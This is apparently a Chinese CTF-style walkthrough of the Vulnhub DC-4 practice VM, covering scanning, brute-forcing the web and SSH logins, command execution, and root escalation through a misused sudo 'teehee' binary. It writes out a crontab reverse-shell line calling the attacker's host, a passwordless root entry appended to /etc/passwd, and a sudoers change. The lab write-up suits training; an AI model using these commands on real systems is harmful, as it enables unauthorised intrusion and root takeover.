Vulnhub-DC-4

入门系列第三弹DC-4

基本信息

下载地址：DC-4
靶机：VMware，NAT
攻击机：kali2
Flag：1个

渗透过程

0x01 探测目标

发现主机，ip为192.168.172.135

nmap -sn 192.168.172.0/24

0x02 初步信息搜集

nmap查看开放端口。发现80和22开放。

nmap -sV -p- 192.168.172.135

80和22，依然和以前一样看看80给我们留下了什么。

0x03 Get Flag

访问80。一个admin的登录界面。

手工简单的试了一下没发现比较明显的sql注入，sqlmap简单尝试了一下也没什么结果，估计是爆破吧，尝试尝试。burp抓个包给intruder。

很简单就爆出了密码是happy。

无论是URI还是我们请求的参数应该都指向了命令执行，我们来修改radio看看是否能获得需要的资源。
因为DC-4中只有一个flag，所以我们一定是与获得root的权限有关，看看passwd里的账户信息。发现有三个账户，charles,jim,sam。
然后我们继续去home下看看每个账户有没有什么有价值的文件。charles和sam的桌面上没有什么有价值的文件。

jim存在一个mbox文件，一个备份目录backups和一个脚本test.sh。
重点肯定是这个backups，去看一看会不会有什么提示。有一个旧密码的bak文件，把他作为密码本爆破jim。
将密码写入文件，hydra爆破。得出密码。

hydra -l jim -P password.txt 192.168.172.135 ssh -f

ssh登录。看一下刚才没看的两个文件有没有什么遗漏的点。发现是个邮件，那么就要去/var/mail看一看了。
发现了一个来自charles账户的邮件，并且给了我们密码。
su切换到charles看看有什么。随便看看没什么文件，看看有什么可以执行的命令。可以看见我们可以使用teehee。
可以看见teehee是一个输入文件的作用，-a会另起一行追加在文件尾部。
仍然是在DC-2里推荐的那篇文章，真的很详细。提权参考
我的第一想法是使用teehee应该可以完成corntab计划任务反弹shell，还有修改passwd来进入root。

0x01 crontab反弹shell

使用teehee在crontab追加一个计划任务，让他反弹一个shell。

sudo teehe /etc/crontab
* * * * * root bash -c "bash -i >&/dev/tcp/10.4.213.91(kali地址)/12345 0>&1"

-c 指非选项参数后面的字符串中读取命令.
-i 交互式shell.
">& /dev/tcp/ip/port "建立TCP连接，并将标准输出和错误重定向到TCP连接，/dev/tcp|udp/ip/port 实际上可以将其看成一个设备(其实如果你访问这个文件的位置他是不存在的).
0>&1 从TCP连接获取输入 .

然后我们监听对应的端口等待shell的反弹，* * * * *就是每分钟执行一次，所以很快就会执行。如果没很快有反应百分之80是命令错了，自己看看哪里有问题。

nc -lvp 12345

成功拿到root权限。

拿到flag。

0x02 /etc/passwd

在passwd中使用:分隔记录行中的每条属性。

用户名
密码
UID：用户标识号
GID： 缺省组标识号
注释性描述：比如存放用户全名等等
宿主目录：用户登录系统后的缺省目录
命令解释器：用户使用的Shell，默认是bash

所以向passwd添加用户,同理完成root的获取。

hack::0:0:::/bin/bash

0x03 sudoer配置文件错误提权

首先看一下/etc/sudoer给出的一部分示例。

root位置所代表的是用户
第一个ALL指的是网络中的主机，我理解的是指工作组中的主机
第二个(ALL:ALL)指的是以谁的身份执行，我们设置为root就可以
第三个ALL指的是命令，可以制定

所以我们只需要添加以下记录

charles ALL=(ALL:ALL) ALL

当我们以sudo执行命令时，此时我们只需要验证charles的身份就可以执行root命令。
关于SUID的提权我不管是/bin/bash还是/bin/sh都失败了，如果大佬成功了可以教一教。

总结

DC-3我虚拟机装不上啊，很悲伤，不过到目前为止一直都是在以提权为主的练习，这次算是teehee的练习吧。加油～